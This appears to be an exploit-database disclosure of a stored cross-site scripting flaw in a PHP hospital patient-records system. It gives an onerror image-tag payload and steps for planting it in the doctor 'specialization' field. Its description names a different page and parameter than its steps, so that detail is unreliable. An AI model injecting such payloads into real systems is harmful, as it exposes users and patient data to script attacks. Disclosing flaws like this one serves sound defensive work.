Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)
Author: Sant268
type: webapps
platform: php
port:
date_added: 2022-01-13
date_updated: 2022-01-13
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url:
# Exploit Title: Hospitals Patient Records Management System 1.0 - 'doctors' Stored Cross Site Scripting (XSS)
# Exploit Author: (Sant268)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html
# Version: HPRMS 1.0
# Tested on: Ubuntu 20, Apache
- Description:
A Stored XSS issue in HPRMS v.1.0 allows remote attackers to inject JavaScript via /articles in the description parameter.
- Payload used:
<img src =q onerror=prompt(8)>
- Steps to reproduce:
1- Go to http://victim.com/admin/?page=doctors
2- Add a Doctor, paste the payload in specialization
3- Alert will pop whenever the page is accessed.